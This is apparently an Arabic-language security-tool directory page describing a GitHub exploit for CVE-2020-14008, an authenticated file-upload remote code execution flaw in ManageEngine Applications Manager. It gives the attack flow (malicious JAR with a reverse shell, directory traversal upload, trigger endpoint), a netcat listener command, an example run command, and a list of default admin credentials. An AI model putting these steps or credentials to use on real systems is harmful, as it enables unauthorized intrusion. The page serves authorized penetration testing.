Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-14008 — CVE-2020-14008 - ManageEngine Applications Manager RCE | Kitploit
أدوات/GitHubGitHub/0x0d3ad/cve-2020-14008
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعدتطوير الحمولات
GitHub0x0d3ad/cve-2020-14008

CVE-2020-14008

CVE-2020-14008 - ManageEngine Applications Manager RCE

عرض المستودع
31منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2020-14008 - تنفيذ الأوامر عن بعد في ManageEngine Applications Manager

تنفيذ الأوامر عن بعد بعد المصادقة عبر تحميل ملف تعسفي في Zoho ManageEngine Applications Manager (الإصدارات <= 14720).

ملخص الثغرة

تنزيل الأداة
التفاصيلالقيمة
CVECVE-2020-14008
CVSS7.2 (عالي)
النوعRCE بعد المصادقة / تحميل ملف تعسفي
المنتجZoho ManageEngine Applications Manager
المتأثرالإصدار 14720 وما دونه
المتطلببيانات اعتماد مسؤول صالحة
النتيجةوصل عكسي على مستوى النظام (SYSTEM)

يستغل الهجوم ميزة اختبار بيانات اعتماد مراقب Weblogic. يقوم مسؤول مصادق بتحميل ملف weblogic.jar خبيث إلى مسار مكتبة Weblogic المتوقع. عند تشغيل اختبار بيانات الاعتماد، يقوم ManageEngine بتحميل weblogic.jndi.Environment من JAR المُحمَّل عبر JarLoader.loadClass() و newInstance()، مما ينفذ كود Java تعسفيًا.

المتطلبات

النظام

  • Python 3.x
  • Java JDK (يجب أن يكون javac و jar في PATH)
  • nc (netcat) لاستقبال الوصلة العكسية

تبعيات Python

root@kitploit:~
pip3 install requests urllib3 lxml

الاستخدام

1. بدء المستمع

root@kitploit:~
nc -lvnp 1337

2. تشغيل الهجوم

root@kitploit:~
python3 cve-2020-14008.py <URL> <USERNAME> <PASSWORD> <LHOST> <LPORT>

أمثلة

root@kitploit:~
# أساسي
python3 cve-2020-14008.py https://192.168.100.2:8443 admin admin 192.168.100.3 1337

تدفق الهجوم

  1. تسجيل الدخول - المصادقة باستخدام بيانات اعتماد المسؤول، والحصول على كود جلسة
  2. التعداد - استرجاع دليل التثبيت الأساسي لـ ManageEngine
  3. بناء JAR - ترجمة فئة Java ضارة (weblogic.jndi.Environment) تحتوي على وصل عكسي داخل weblogic.jar
  4. التحميل - تحميل JAR إلى classes/weblogic/version8/ عبر اجتياز الدليل (النسخ الاحتياطي: إنشاء مهمة مجدولة لنقلها)
  5. التشغيل - استدعاء اختبار بيانات اعتماد Weblogic في /testCredential.do، الذي يقوم بتحميل وإنشاء مثيل للفئة الضارة
  6. الوصلة - يتصل الوصل العكسي بالمستمع

بيانات الاعتماد الافتراضية

اسم المستخدمكلمة المرور
adminadmin
adminpassword
administratoradministrator
guestguest

حل المشكلات

الخطأالإصلاح
release version 7 not supportedJava 21+ أسقط هدف Java 7. يستخدم السكربت --release 8
FileNotFoundError: weblogic.jarفشل تجميع JAR. تحقق من وجود javac و jar في PATH
No valid response from used sessionبيانات اعتماد غير صالحة
Actionname not foundفشل إنشاء المهمة، تحقق من صلاحيات المسؤول

المراجع

  • NVD - CVE-2020-14008
  • Exploit-DB #48793
  • ManageEngine Advisory

إخلاء مسؤولية

هذه الأداة مقدمة لاختبار الاختراق المصرح به والبحث الأمني فقط. الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن لاختبارها غير قانوني.